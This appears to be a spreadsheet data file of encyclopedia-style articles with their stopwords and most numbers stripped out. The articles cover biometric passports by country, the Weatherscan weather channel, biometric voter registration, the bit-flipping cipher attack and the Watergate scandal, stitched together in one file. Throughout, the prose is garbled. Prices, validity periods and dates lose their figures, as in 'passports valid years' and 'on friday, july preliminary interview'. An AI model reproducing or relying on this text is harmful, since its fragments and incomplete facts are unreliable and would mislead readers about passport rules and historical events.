uzbekistan uzbekistan june 2009 islam karimov issued presidential decree measures improve passport system republic uzbekistan." december 2009 president uzbekistan signed decree change dates phased exchange populations existing passport biometric passport. accordance decree, biometric passports phased beginning january 2011. first phase, biometric passport issued employees ministries, departments agencies republic, individuals travel abroad outside country, well citizens receive passport connection achievement certain grounds provided law. second phase rest population able passports period 2012 2015. vietnam from july 2020, vietnamese citizens able apply electronic passports. europe european union efta planned that, except denmark ireland, passports would digital imaging fingerprint scan biometrics placed rfid chips. this combination biometrics aims create unrivaled level security protection fraudulent identification papers. technical specifications passports established european commission. specifications binding schengen agreement parties, i.e. countries, except ireland, four european free trade association countries—iceland, liechtenstein, norway switzerland. these countries obliged implement machine readable facial images passports august 2006, fingerprints june 2009. european data protection supervisor stated current legal framework fails "address possible relevant issues triggered inherent imperfections biometric systems".irish biometric passports used digital image fingerprinting. german passports printed november 2007 contain fingerprints, hand, addition digital photograph. romanian passports also contain fingerprints, hand. netherlands also takes fingerprints member plans store fingerprints centrally. according requirements, nations signatories schengen acquis required fingerprint biometrics.in nations, passport prices austria (available since june 2006): adult passport costs €75.90, chip-free child's version costs €30. march 2009 newly issued adult passports contain fingerprints. passports valid years issuance children years children aged 2–11; years citizens aged older. belgium (introduced october 2004): children local taxes. 2014, passports adults valid years. bulgaria (introduced july 2009; available since march 2010): (€20) adults. passports valid years. croatia (available since july 2009): (€53). chip contains fingerprints digital photo holder. since january 2010 biometric passports obtained issuing offices inside croatia. diplomatic missions consular offices must implement issuing system june 2010. cyprus (available since december 2010): €70, valid years czech republic (available since september 2006): adults (valid years), children (valid years). passports contain fingerprints. denmark (available since august 2006): adults (valid years), children 0–11,(valid 2years (age 0–2) years) children 12–17,(valid years)and retirement (from july 2021 years) (valid years). standardised photo must supplied too. january 2012 newly issued passports contain fingerprints. estonia (available since 2007): (€28.76) (valid years). june 2009, newly issued passports contain fingerprints. finland (available since august 2006): (valid years). june 2009, newly issued passports contain fingerprints. france (available since april 2006): (depending whether applicant provides photographs), valid years. june 2022, newly issued passports contain fingerprints exception emergency passports hold validity year. germany (available since november 2005): year applicants (valid years) €37.50 years (valid years) €60. passports issued november 2007 onwards include fingerprints. greece (available since august 2006): €84.40 (valid years). since june 2009, passports contain fingerprints. hungary (available since august 2006): 7,500 (€26), valid years, 14,000 (€48.50) valid years. june 2009, newly issued passports contain fingerprints. ireland: biometric passport booklets available since october 2006, biometric passport cards since october 2015. 34-page passport booklets priced €75, 66-page booklets €105, valid years. children aged years price €26.50 passport booklets valid years. infants' passport booklets years cost expire years issue. irish biometric passport cards available adults years already irish passport booklet cost €35. they expire date holder's irish passport booklet years issue, whichever shorter period. (ireland signatory schengen acquis obligation plans implement fingerprint biometrics.) italy (available since october 2006): €116, valid years. january 2010 newly issued passports contain fingerprints. latvia (available since november 2007): adult passport costs €28.46, €21.34 received together eid, valid years. lithuania (available since august 2006): €43. children years old, valid years. persons years old, valid years. malta (available since october 2008): persons years old, valid years, children 10–16 years (valid years) children years (valid years). netherlands (available since august 2006): approximately regular passport (€38.33) cost €49.33. passports issued september 2009 include fingerprints. dutch identity cards lookalike versions holder's page passport contain fingerprints. poland (available since august 2006): (€35) adults, children aged free seniors years, valid years years children aged 13). passports issued june 2009 include fingerprints index fingers. portugal (available since july 2006 special passport; august 2006 ordinary passport): citizens valid years. passports pages. romania (available since december 2008): citizens citizens valid years years years january 2010, passport includes facial images fingerprints. temporary passports valid year issued price issued less working days. slovakia (available since january 2008): adult passport (&gt;13 years) costs €33.19 valid years, chip-free child's (5–13 years) version costs €13.27 valid years children years €8.29, valid years. latest version issued 2014 contains contactless chip biodata card meets icao specifications. slovenia (available since august 2006): €42.05 adults, valid years. €35.25 children years age, valid years. €31.17 children years age, valid years. passports pages, 48-page version available €2.50 surcharge. june 2009, newly issued passports contain fingerprints. spain (available since august 2006) price (price 2018), free passports issued citizens hold "familia numerosa" document. they include fingerprints index fingers october 2009. (aged less spanish passport valid years, otherwise remain valid years). sweden (available since october 2005): (valid years). january 2012, passport includes facial images fingerprints.in efta, passport prices iceland issued since 2006 costing 5100 (isk 1900 67). liechtenstein biometric passports issued since october 2006. technical specifications binding liechtenstein became part schengen area 2011. cost passport ranges (children adults. norway issued since 2005, costs adults, €50, children. increased 570/342 2020. 2007 norwegian government launched ‘multi-modal’ biometric enrolment system supplied motorola. motorola's system enabled multiple public agencies digitally capture store fingerprints, facial images signatures passports visas. norwegian biometrics company idex begun development electronic cards (eid) fingerprint security technology throughout switzerland issued since september 2006, costs adults children years. since march 2010, issued passports biometric, containing photograph fingerprints recorded electronically. other european albania issued since 2009, costs 7500 lekë (€60). valid years. contains fingerprints, bearer's photo data written passport. bosnia herzegovina issued since october 2009 costing (€25.65). valid years adults years younger june 2010 bosnia herzegovina issued first passport. kosovo issued since october 2011. sovereign military order malta issued since 2005 smom diplomatic service passports include biometric features compliant icao standards. moldova issued since january 2008, costing approximately (€45) obligatory january 2011. passport republic moldova biometric data contains chip holds digital information, including holder's signature, well traditional information. valid years (for persons years (for persons less respectively. introduced request european union safeguard borders e.u. republic moldova. montenegro issued since 2008, costing €33. north macedonia issued since april 2007, costs 1500 €22. russia issued since 2006. since august 2018, cost 5,000 rubles (approximately us$80) printed data, photo fingerprints bac-encrypted. biometric passports issued march 2010 valid years. russian biometric passports currently issued within russia consulates. from january 2015, passports contain fingerprints. serbia issued since july 2008, costs 3,600 approximately €32. valid years, years children aged years children aged less. ukraine first planned issue biometric passports identity cards january 2013. they started issued since january 2015.starting august 2021, ukrainian citizens digital passports identity cards diia legal purposes within ukraine.in ukraine, term "digital passport" used denote fully digital version biometric passport accessible diia mobile app. united kingdom united kingdom introduced march 2006, initially costing £72.50 adults (valid years) children (valid years). north america canada issued since july 2013. contains bearer's name, gender, date place birth digital portrait face. costa rica issued since march 2022. honduras issued since march 2022. available citizens, biometric passports replaced regular passports. regular passports valid expiry date. price remained us$35 5-year period us$50 10-year period. passport icao-compliant biometric symbol printed biographical data page well bottom front cover. mexico issued since october 2021. panama issued since 2014, costs $100. saint vincent grenadines issued since march 2014. united states biometric version u.s. passport (sometimes referred electronic passport) descriptive data digitized passport photo contactless chips, fingerprint information placed onto contactless chip. however, chip large enough kilobytes) inclusion biometric identifiers. u.s. department state first issued passports 2006, since august 2007 issues biometric passports only. non-biometric passports valid expiration dates.although system able perform facial-recognition match bearer image stored contactless chip desired, unclear system deployed u.s. department homeland security ports entry.a high level security becam</t>
  </si>
  <si>
    <t>Weatherscan</t>
  </si>
  <si>
    <t>weatherscan american digital cable satellite television network owned allen media group. spinoff weather channel, weatherscan features uninterrupted local weather information graphical format continuous loop generated intellistar unit installed cable provider's headend; unlike weather channel, weatherscan feature on-air talent kind. overview channel launched march 1999, weatherscan local. originally, weatherscan operated five collective services local weather information: weatherscan local featured animated weather information complete local weather segment every minutes; weatherscan radar featured continuous doppler radar loop, along severe weather advisories warranted; weatherscan plus (debuted april 1999) featured activity-specific forecasts golf, skiing, boating, beachgoing, business leisure travel; weatherscan plus traffic (may 1999) featured format weatherscan plus inclusion traffic information; weatherscan español, launched weatherscan plus traffic, spanish-language version weatherscan plus allowing regional international weather information.the intellistar unit used weatherscan configured differently used weather channel, featuring different graphics additional forecast products, information running continuous basis. vocal local, pre-recorded narration function installed intellistar system—which utilizes different narration track used weather channel's local forecast segments, featuring female announcer—introduces several segments. prime, weatherscan available many major markets around united states, though availability widespread parent network weather channel. many cable providers offer weatherscan digital tiers, although providers carry weatherscan basic tier (where weather channel also offered). 2011, dish network became first satellite provider weatherscan. verizon fios dropped weatherscan, along parent network weather channel, lineup 12:00 a.m. march 2015 parties unable come terms carriage agreement. service replaced local weatherbug "widget" markets. public announcement made regarding issue hours discontinuation. verizon said reason dropping services many customers turn internet mobile apps weather time day.while domestic intellistars decommissioned replaced newer intellistar units november 2015, modified intellistar units currently still active weatherscan. with rise online weather information available computers mobile devices, channel seen decreased relevance 2010s. comcast removed channel xfinity systems throughout third quarter 2017.as 2022, channel mostly discontinued major cable providers, however weatherscan units still operation smaller cable operators. largely replaced function local now. sale entertainment studios march 2018, byron allen's entertainment studios announced intent acquire weather channel's television assets nbcuniversal/blackstone group partnership. actual value undisclosed, reported around $300 million; channel's non-television assets, separately sold years prior, included sale. products weatherscan displays variety forecast products show different types weather information, included certain providers. during early 2000s, channel's segments generated mainly weatherstar systems, five different products, excluding local product, could chosen display. weatherscan timeline note: "domestic intellistar" refers stars output content weather channel. national/satellite feed when weatherscan local debuted 1999, channel maintained national feed used satellite smaller cable providers could afford secondary technologically advanced weatherstar system local weatherscan feed. national feed, branded simply weatherscan, debuted july 1998, current temperatures extended forecasts select cities throughout united states, well national regional radar images. there uncertainty whether national version discontinued; however, since weatherscan local simplified name "weatherscan" 2003, likely national feed discontinued around time. weatherscan feed launched june 2011, dish network subscribers, replacing short-lived service weather cast founded replacement weather channel result 2010 carriage dispute satellite provider; weatherscan feed provides regionalized information cities within miles given area, delivered manner weatherscan systems cable providers. weatherscan dropped june 2015, weathernation took place regional viewers. also weather channel intellistar intellistar intellistar weather star weatherstar weather star references external links weather channel</t>
  </si>
  <si>
    <t>Biometric voter registration</t>
  </si>
  <si>
    <t>biometric voter registration implicates using biometric technology (capturing unique physical features individual fingerprinting commonly used), times addition demographics voter, polling registration and/or authentication. enrollment infrastructure allows collecting maintaining database biometric templates voters. biometric voting project might include introducing biometric registration kits enrolment voters; using electronic voter identification devices election day; issuing voter identification documents (i.e. biometric voter cards), among others. chronological stages adopting biometric voting registration project usually include assessment; feasibility studies; securing funding; reviewing legislation; pilot projects mock registration exercises; procurement; distribution equipment, installation, testing; recruitment training staff; voter information; deployment and, post-election audits.the final implementing biometric election technology achieving de-duplication voting register, thus preventing multiple voter registration multiple voting; improving identification voter polling station, mitigating incidence voter fraud (e.g. buy/rent voters election).however, vital commissions carrying election projects first foremost guarantee legal framework supports biometric voter identification, data captured registration process secured maintaining basic requirements: personalization privacy. likewise, imperative contingency mechanisms place, case biometric systems malfunction. main challenges ensure given eventualities technological hitches failures, single voter disenfranchised. countries biometric voter registration according international idea's icts elections database, 2016, number countries adopting biometrics elections steadily increased significant differences regions. "while virtually users europe, half countries africa latin america technology elections." cent surveyed electoral management bodies capturing biometric data (such fingerprints photos) part voter registration process (2016).countries used biometric voting registration include armenia, angola, bangladesh, bhutan, bolivia, brazil, burkina faso, cambodia, cameroon, chad, colombia, comoros, congo (democratic republic of), costa rica, cote d'ivoire, dominican republic, fiji, gambia, ghana, guatemala, india, iraq, kenya, lesotho, liberia, malawi, mali, mauritania, mexico, morocco, mozambique, namibia, nepal, nicaragua, nigeria, panama, peru, philippines, senegal, sierra leone, solomon islands, somaliland, swaziland, tanzania, uganda, uruguay, venezuela, yemen, zambia, zimbabwe. advocacy criticism some promoters biometric voting registration point technology, properly customised country's needs well implemented, could offer better accessibility citizens; help avoiding long queues waiting times registration voting; simplicity speed election cycle (e.g. voter identification documents make easier polling staff verify voter details); make voters commissions feel confident quality registry (more accurate, reliable complete data); improve e-voting security, considerably reduce eliminate multiple registration multiple voting, mitigating risk impersonation, identity theft, misuse records deceased voters, carousel voting ballot-box stuffing.on hand, criticise disapprove biometrics voter identification maintain using biometrics election purposes raises concerns voters' privacy, human dignity governmental disclosure personal information. some critics claim biometrics voting poses serious threat democracy, fears violation secrecy vote correlation voter-vote).the concerns application biometrics identification authentication manifold. there example, possibility voter disenfranchisement characteristics typically used identify verify voters might become unavailable (e.g. bandaged finger, loss finger, failure acquire dirt fingerprint quality degradation). similarly, also claims potential logistical procedural "new problems" biometric identification devices bring election cycle: increasing costs (initial purchase costs biometric readers infrastructure, costs linked maintenance, storage upgrades) resources' allocation (human, time, material); additional training commissions polling staff, technological failures could disenfranchise voters; extra data storage demands higher security. also electoral roll electronic identification electronic pollbook voter laws references</t>
  </si>
  <si>
    <t>Bit-flipping attack</t>
  </si>
  <si>
    <t>bit-flipping attack attack cryptographic cipher attacker change ciphertext result predictable change plaintext, although attacker able learn plaintext itself. note type attack not—directly—against cipher cryptanalysis would be), particular message series messages. extreme, could become denial service attack messages particular channel using cipher.the attack especially dangerous attacker knows format message. situation, attacker turn similar message important information altered. example, change destination address might alter message route force re-encryption weaker cipher, thus possibly making easier attacker decipher message.when applied digital signatures, attacker might able change promissory note stating $10.00" stating $10,000".stream ciphers, rc4, vulnerable bit-flipping attack, block cipher modes operation. stream cipher attack. keyed message authentication code, digital signature, authentication mechanism allows recipient detect bits flipped transit. references external links wireless security white paper</t>
  </si>
  <si>
    <t>Watergate scandal</t>
  </si>
  <si>
    <t>watergate scandal major political scandal united states involving administration u.s. president richard nixon 1972 1974 nixon's resignation. scandal stemmed nixon administration's continual attempts cover involvement june 1972 break-in democratic national committee headquarters washington, d.c., watergate office building. after five perpetrators arrested, press u.s. justice department connected cash found time committee re-election president. further investigations, along revelations subsequent trials burglars, u.s. house representatives grant u.s. house committee judiciary additional investigative authority—-to probe "certain matters within jurisdiction"— u.s. senate create u.s. senate watergate committee. resulting senate watergate hearings broadcast "gavel-to-gavel" nationwide pbs, aroused public interest. witnesses testified nixon approved plans cover administration’s involvement break-in, voice-activated taping system oval office. throughout investigation, nixon’s administration resisted probes, constitutional crisis.several major revelations egregious presidential actions obstructing investigation later 1973 prompted house commence impeachment process nixon. u.s. supreme court ruled nixon release oval office tapes government investigators. nixon white house tapes revealed conspired cover activities took place break-in later tried federal officials deflect attention investigation. house judiciary committee approved three articles impeachment nixon obstruction justice, abuse power, contempt congress. with complicity cover-up made public, political support completely eroded, nixon resigned office august 1974. generally believed that, done would impeached house removed office trial senate. u.s. president resigned office. september 1974, nixon's successor, gerald ford, pardoned him. there people indicted people—many nixon administration officials—convicted. metonym watergate came encompass array clandestine often illegal activities undertaken members nixon administration, including bugging offices political opponents people nixon officials suspicious; ordering investigations activist groups political figures; using federal bureau investigation, central intelligence agency, internal revenue service political weapons. suffix -gate identifying term since become synonymous public scandal, especially political scandal. wiretapping democratic party's headquarters january 1972, gordon liddy, finance counsel committee re-election president (crp) former aide john ehrlichman, presented campaign intelligence plan crp's acting chairman stuart magruder, attorney general john mitchell, presidential counsel john dean involved extensive illegal activities democratic party. according dean, marked "the opening scene worst political scandal twentieth century beginning nixon presidency".mitchell viewed plan unrealistic. months later, mitchell approved reduced version plan, including burglarizing democratic national committee's (dnc) headquarters watergate complex washington, d.c.—ostensibly photograph campaign documents install listening devices telephones. liddy nominally charge operation, since insisted duped dean least subordinates, included former officers howard hunt james mccord, latter serving then-crp security coordinator john mitchell resigned attorney general become chairman.in may, mccord assigned former agent alfred baldwin carry wiretapping monitor telephone conversations afterward. mccord testified selected baldwin's name registry published fbi's society former special agents work committee re-elect president nixon. baldwin first served bodyguard martha mitchell—john mitchell's wife, living washington. baldwin accompanied martha mitchell chicago. eventually committee replaced baldwin another security man.on mccord arranged baldwin, investigative reporter hougan described "somehow special perhaps well known mccord," stay howard johnson's motel across street watergate complex. room booked name mccord's company. behest liddy hunt, mccord team burglars prepared first watergate break-in, began 28.two phones inside headquarters' offices said wiretapped. robert spencer oliver's phone. time, oliver working executive director association state democratic chairmen. phone belonged chairman larry o'brien. found evidence o'brien's phone bugged; however, determined effective listening device installed oliver's phone. while successful installing listening devices, committee agents soon determined needed repairs. they plotted second "burglary" order take care situation.sometime midnight saturday, june 1972, watergate complex security guard frank wills noticed tape covering latches complex's doors leading underground parking garage several offices, allowed doors close stay unlocked. removed tape, believing nothing. when returned short time later discovered someone retaped locks, called police. responding call unmarked police three plainclothes officers (sgt. paul leeper, officer john barrett, officer carl shoffler) working overnight "bum squad"—dressed hippies lookout drug deals street crimes. alfred baldwin, "spotter" duty howard johnson's hotel across street, distracted watching film attack puppet people failed observe arrival police front watergate building. neither plainclothes officers investigating dnc's sixth floor suite offices. time baldwin finally noticed unusual activity sixth floor radioed burglars, already late. police apprehended five men, later identified virgilio gonzalez, bernard barker, james mccord, eugenio martínez, frank sturgis. they charged attempted burglary attempted interception telephone communications. washington post reported "police found lock-picks door jimmies, almost $2,300 cash, $100 bills serial numbers sequence short wave receiver could pick police calls, rolls unexposed film, millimeter cameras three pen-sized tear guns". post would later report actual amount cash "[a]bout $100 bills found five arrested watergate."the following morning, sunday, june gordon liddy called magruder angeles informed "the four arrested mccord cuban freedom fighters, howard hunt recruited". initially, nixon's organization white house quickly went work cover crime evidence might damaged president reelection.on september 1972, grand jury indicted five office burglars, well hunt liddy, conspiracy, burglary, violation federal wiretapping laws. burglars tried jury, judge john sirica officiating, pled guilty convicted january 1973. cover-up unraveling initial cover-up within hours burglars' arrests, discovered howard hunt's name barker martínez's address books. nixon administration officials concerned hunt liddy also involved separate secret activity known "white house plumbers", established stop security "leaks" investigate sensitive security matters. dean later testified nixon aide john ehrlichman ordered "deep six" contents howard hunt's white house safe. ehrlichman subsequently denied this. end, dean fbi's acting director patrick gray separate operations) destroyed evidence hunt's safe. nixon's reaction break-in, least initially, skepticism. watergate prosecutor james neal sure nixon known advance break-in. evidence, cited conversation taped june president chief staff, haldeman, nixon asked, "who asshole that?" however, nixon subsequently ordered haldeman block fbi's investigation source funding burglary. days later, nixon's press secretary, ziegler, described event third-rate burglary attempt". august news conference, nixon stated dean conducted thorough investigation incident, dean actually conducted investigations all. nixon furthermore said, categorically white house staff, administration, presently employed, involved bizarre incident." september nixon congratulated dean, saying, "the handled seems skillful, you—putting fingers dikes every time leaks sprung sprung there." kidnapping martha mitchell martha mitchell wife nixon's attorney general, john mitchell, recently resigned role could become campaign manager nixon's committee re-election president (crp). john mitchell aware martha knew mccord, watergate burglars arrested, upon finding out, likely speak media. opinion, knowing mccord likely link watergate burglary nixon. john mitchell instructed guards security detail contact media.in june 1972, phone call united press international reporter helen thomas, martha mitchell informed thomas leaving husband resigned crp. phone call ended abruptly. days later, marcia kramer, veteran crime reporter york daily news, tracked mitchell westchester country club rye, york, described mitchell beaten woman" visible bruises. mitchell reported that, week following watergate burglary, held captive hotel california, security guard steve king ended call thomas pulling phone cord wall. mitchell made several attempts escape balcony, physically accosted, injured, forcefully sedated psychiatrist. following conviction role watergate burglary, february 1975, mccord admitted mitchell "basically kidnapped", corroborated reports event. money trail june 1972, press reported watergate burglars republican party security aide. former attorney general john mitchell, head committee re-elect president (crp), denied involvement watergate break-in. also disavowed knowledge whatsoever five burglars. august $25,000 (approximately $162,000 2021 dollars) cashier's check found deposited mexican bank accounts watergate burglars, bernard barker. made finance committee committee reelect president, check 1972 campaign donation kenneth dahlberg. this money (and several checks lawfully donated crp) directly used finance burglary wiretapping expenses, including hardware supplies. barker's multiple national international businesses separate bank accounts, found attempted disguise true origin money paid burglars. donor's checks demonstrated burglars' direct link finance committee crp. donations totalling $86,000 ($557,000 today) made individuals believed making private donations certified cashier's checks president's re-election. investigators' examination bank records miami company watergate burglar barker revealed account controlled personally deposited check transferred federal reserve check clearing system. banks originated checks keen ensure depository institution used barker acted properly ensuring checks received endorsed check's payee, acceptance deposit bernard barker's account. only would issuing banks held liable unauthorized improper release funds customers' accounts. investigation fbi, cleared barker's bank fiduciary malfeasance, direct implication members crp, checks delivered. those individuals committee bookkeeper treasurer, hugh sloan. private organization, committee followed normal business practice allowing duly authorized individuals accept endorse checks behalf committee. financial institution could accept process check behalf committee unless duly authorized individual endorsed checks deposited barker's bank account endorsed committee treasurer hugh sloan, authorized finance committee. however, sloan endorsed check made payable committee, legal fiduciary responsibility check deposited accounts named check. sloan failed that. when confronted potential charge federal bank fraud, revealed committee deputy director magruder finance director maurice stans directed give money gordon liddy. liddy, turn, gave money barker attempted hide origin. barker tried disguise funds depositing accounts banks outside united states. unbeknownst barker, liddy, sloan, complete record transactions held roughly months. barker's foreign banks april 1972 deposit checks withdraw funds cashier's checks money orders, resulted banks keeping entire transaction records october november 1972. five watergate burglars directly indirectly tied 1972 crp, thus causing judge sirica suspect conspiracy involving higher-echelon government officials.on september 1972, press reported john mitchell, serving attorney general, controlled secret republican fund used finance intelligence-gathering democrats. october woodward carl bernstein washington post reported determined watergate break-in part massive campaign political spying sabotage behalf nixon re-election committee. despite revelations, nixon's campaign never seriously jeopardized; november president re-elected biggest landslides american political history. role media connection break-in re-election committee highlighted media coverage—in particular, investigative coverage washington post, time, york times. coverage dramatically increased publicity consequent political legal repercussions. relying heavily upon anonymous sources, post reporters woodward carl bernstein uncovered information suggesting knowledge break-in, attempts cover deeply upper reaches justice department, fbi, cia, white house. woodward bernstein interviewed judy hoback miller, bookkeeper nixon's re-election campaign, revealed information mishandling funds records destroyed. chief among post's anonymous sources individual woodward bernstein nicknamed deep throat; years later, 2005, informant identified william mark felt, sr., deputy director period 1970s, something woodward later confirmed. felt secretly woodward several times, telling howard hunt's involvement watergate break-in, white house staff regarded stakes watergate extremely high. felt warned woodward wanted know reporters getting information, uncovering wider crimes first disclosed. secret meetings woodward felt took place underground parking garage rosslyn period june 1972 january 1973. prior resigning june 1973, felt also anonymously planted leaks watergate time magazine, washington daily news publications.during early period, media failed understand full implications scandal, concentrated reporting topics related 1972 presidential election. most outlets ignored downplayed woodward bernstein's scoops; crosstown washington star-news angeles times even stories incorrectly discrediting post's articles. after post revealed h.r. haldeman made payments secret fund, newspapers like chicago tribune philadelphia inquirer failed publish information, publish white house's denial story following day. white house also sought isolate post's coverage tirelessly attacking newspaper declining criticize damaging stories scandal york times time magazine.after learned convicted burglars written judge sirica alleging high-level cover-up, media shifted focus. time magazine described nixon undergoing "daily hell little trust". distrust press nixon administration mutual greater usual lingering dissatisfaction events vietnam war. time, public distrust media polled 40%.nixon administration officials discussed using government agencies "get" retaliate against) perceived hostile media organizations. such actions taken before. request nixon's white house 1969, tapped phones five reporters. 1971, white house requested audit return editor newsday, wrote series articles financial dealings charles "bebe" rebozo, friend nixon.the administration supporters accused media making "wild accusations", putting much emphasis story, liberal bias administration. nixon said 1974 interview supporter baruch korff followed liberal policies thought media preferred, "watergate would blip." media noted reporting turned accurate; competitive nature media guaranteed widespread coverage far-reaching political scandal. scandal escalates rather ending conviction sentencing prison five watergate burglars january 1973, investigation break-in nixon administration's involvement grew broader. "nixon's conversations late march april 1973 revealed know needed remove haldeman, ehrlichman, dean gain distance them, least likely incriminate presidency. nixon created conspiracy—to effect cover-up cover-up—which began late march 1973 became fully formed june 1973, operating presidency ended august 1974." march 1973, judge sirica read court letter watergate burglar james mccord, alleged perjury committed watergate trial, defendants pressured remain silent. attempt make talk, sirica gave hunt burglars provisional sentences years. urged nixon, march aide john ehrlichman told attorney general richard kleindienst nobody white house prior knowledge burglary. april magruder told u.s. attorneys perjured burglars' trial, implicated john dean john mitchell.john dean believed mitchell, ehrlichman, haldeman could prosecutors, tell truth, save presidency. dean wanted protect president four closest take fall telling truth. during critical meeting dean nixon april 1973, dean totally unaware president's depth knowledge involvement watergate cover-up. meeting dean felt recorded. wondered nixon speaking, trying prod attendees' recollections earlier conversations fundraising. dean mentioned observation testifying senate committee watergate, exposing thread taped conversations would unravel fabric conspiracy.two days later, dean told nixon cooperating u.s. attorneys. day, u.s. attorneys told nixon haldeman, ehrlichman, dean, white house officials implicated cover-up.on april nixon asked resignation haldeman ehrlichman, influential aides. they later indicted, convicted, ultimately sentenced prison. asked resignation attorney general kleindienst, ensure could claim innocent friendship haldeman ehrlichman could construed conflict. fired white house counsel john dean, went testify senate watergate committee said believed suspected conversations oval office taped. this information became bombshell helped force richard nixon resign rather impeached.writing prison west york magazines 1977, ehrlichman claimed nixon offered large money, declined.the president announced resignations address american people: difficult decisions presidency, accepted resignations closest associates white house, haldeman, john ehrlichman, finest public servants privilege know. because attorney general kleindienst, though distinguished public servant, personal friend years, personal involvement whatsoever matter close personal professional associate involved case, felt also necessary name attorney general. counsel president, john dean, also resigned. day, april nixon appointed attorney general, elliot richardson, gave authority designate special counsel watergate investigation would independent regular justice department hierarchy. 1973, richardson named archibald position. senate watergate hearings revelation watergate tapes february 1973, united states senate voted 77-to-0 approve s.res. establish select committee investigate watergate, ervin named chairman next day. hearings held senate committee, dean former administration officials testified, broadcast august three major networks time agreed take turns covering hearings live, network thus maintaining coverage hearings every third day, starting ending august estimated americans television sets tuned least portion hearings.on friday, july preliminary interview, deputy minority counsel donald sanders asked white house assistant alexander butterfield type recording system white house. butterfield said reluctant answer, finally admitted system white house automatically recorded everything oval office, cabinet room others, well nixon's private office executive office building. monday, july front live, televised audience, chief minority counsel fred thompson asked butterfield whether "aware installation listening devices oval office president". butterfield's revelation taping system transformed watergate investigation. immediately subpoenaed tapes, senate, nixon refused release them, citing executive privilege president, ordered drop subpoena. refused. saturday night massacre october 1973, refused drop subpoena, nixon ordered attorney general elliot richardson fire special prosecutor. richardson resigned protest rather carry order. nixon ordered deputy attorney general william ruckelshaus fire cox, ruckelshaus also resigned rather fire him. nixon's search someone justice department willing fire ended solicitor general robert bork. though bork said believed nixon's order valid appropriate, considered resigning avoid "perceived president's bidding save job". bork carried presidential order dismissed special prosecutor. these actions considerable public criticism. responding allegations possible wrongdoing, front associated press managing editors disney's contemporary resort, november 1973, nixon emphatically stated, "well, crook." needed allow bork appoint special prosecutor; bork chose leon jaworski continue investigation. legal action nixon administration members march 1974, grand jury washington, d.c., indicted several former aides nixon, became known "watergate seven"—h. haldeman, john ehrlichman, john mitchell, charles colson, gordon strachan, robert mardian, kenneth parkinson—for conspiring hinder watergate investigation. grand jury secretly named nixon unindicted co-conspirator. special prosecutor dissuaded indictment nixon, arguing president indicted leaves office. john dean, stuart magruder, figures already pleaded guilty. april 1974, dwight chapin, former nixon appointments secretary, convicted lying grand jury. days later, grand jury indicted reinecke, republican lieutenant governor california, three charges perjury senate committee. release transcripts nixon administration struggled decide materials release. parties involved agreed pertinent information released. whether release unedited profanity vulgarity divided advisers. legal team favored releasing tapes unedited, press secretary ziegler preferred using edited version "expletive deleted" would replace material. after several weeks debate, decided release edited version. nixon announced release transcripts speech nation april 1974. nixon noted audio pertinent national security information could redacted released tapes.initially, nixon gained positive reaction speech. people read transcripts next couple weeks, however, former supporters among public, media political community called nixon's resignation impeachment. vice president gerald ford said, "while easy delete characterization printed page, cannot delete characterization people's minds wave hand." senate republican leader hugh scott said transcripts revealed "deplorable, disgusting, shabby, immoral" performance part president former aides. house republican leader john jacob rhodes agreed scott, rhodes recommended nixon's position continued deteriorate, "ought consider resigning possible option".the editors chicago tribune, newspaper supported nixon, wrote, humorless point inhumane. devious. vacillating. profane. willing led. displays dismaying gaps knowledge. suspicious staff. loyalty minimal." providence journal wrote, "reading transcripts emetic experience; comes away feeling unclean." this newspaper continued that, transcripts revealed indictable offense, showed nixon contemptuous united states, institutions, people. according time magazine, republican party leaders western u.s. felt remained significant number nixon loyalists party, majority believed nixon step quickly possible. they disturbed language coarse, vindictive tone conversations transcripts. supreme court issue access tapes went united states supreme court. july 1974, united states nixon, court ruled unanimously (8–0) claims executive privilege tapes void. (then-justice william rehnquist—who recently appointed court nixon recently served nixon justice department assistant attorney general office legal counsel—recused case.) court ordered president release tapes special prosecutor. july 1974, nixon complied order released subpoenaed tapes public. release tapes tapes revealed several crucial conversations took place president counsel, john dean, march 1973. conversation, dean summarized many aspects watergate case, focused subsequent cover-up, describing "cancer presidency". burglary team paid hush money silence dean stated: "that's troublesome post-thing, [haldeman] involved that; john [ehrlichman] involved that; involved that; mitchell involved that. that's obstruction justice." dean continued, saying howard hunt blackmailing white house demanding money immediately. nixon replied money paid: "... looking immediate problem, have—handle hunt's financial situation damn soon? keep bottle much, order options".at time initial congressional proceedings, known nixon known approved payments watergate defendants earlier conversation. nixon's conversation haldeman august several establishes did. nixon said: "well paid. that's that. they paid." during congressional debate impeachment, believed impeachment required criminally indictable offense. nixon's agreement make blackmail payments regarded affirmative obstruct justice.on december investigators found 18+1⁄2-minute portion recorded tape erased. rose mary woods, nixon's longtime personal secretary, said accidentally erased tape pushing wrong pedal tape player answering phone. press photos set-up, showing unlikely woods answer phone keeping foot pedal. later forensic analysis 2003 determined tape erased several segments—at least five, perhaps many nine. final investigations resignation nixon's position becoming increasingly precarious. february 1974, house representatives approved h.res. giving judiciary committee authority investigate impeachment president. july 1974, house judiciary committee voted 27-to-11 recommend first article impeachment president: obstruction justice. committee recommended second article, abuse power, july 1974. next day, july 1974, committee recommended third article: contempt congress. august 1974, house authorized printing committee report rep. 93–1305, included text resolution impeaching nixon forth articles impeachment him. "smoking gun" tape august 1974, white house released previously unknown audio tape june 1972. recorded days break-in, documented initial stages cover-up: revealed nixon haldeman meeting oval office discussed stop continuing investigation break-in, recognized high risk position scandal revealed. haldeman introduced topic follows: democratic break-in thing, we're back the—in the, problem area control, gray exactly know control them, investigation leading productive areas goes directions want after explaining money traced burglars, haldeman explained nixon cover-up plan: "the handle walters [cia] call gray [fbi] say, 'stay hell business want it.'"nixon approved plan, given information involvement campaign break-in, told haldeman: "all right, fine, understand all. second-guess mitchell rest." returning obstruct fbi, instructed haldeman: "you call good. good deal. play tough. that's play that's going play it."nixon denied constituted obstruction justice, instructions ultimately resulted truthfully reporting national security issues. nixon urged press forward investigation expressed concern interference.before release tape, nixon denied involvement scandal. claimed political motivations instructions cia, claimed knowledge march 1973, involvement senior campaign officials john mitchell. contents tape persuaded nixon's lawyers, fred buzhardt james clair, "the president lied nation, closest aides, lawyers—for years". tape, barber conable referred "smoking gun", proved nixon involved cover-up beginning. week nixon's resignation, ehrlichman haldeman tried unsuccessfully nixon grant pardons—which promised april 1973 resignations. resignation release smoking tape destroyed nixon politically. congressmen voted three articles impeachment house judiciary committee announced would support impeachment article accusing nixon obstructing justice articles came full house. additionally, john jacob rhodes, house leader nixon's party, announced would vote impeach, stating "coverup criminal activity misuse federal agencies neither condoned tolerated".on night august 1974, senators barry goldwater hugh scott congressman rhodes nixon oval office. scott rhodes republican leaders senate house, respectively; goldwater brought along elder statesman. three lawmakers told 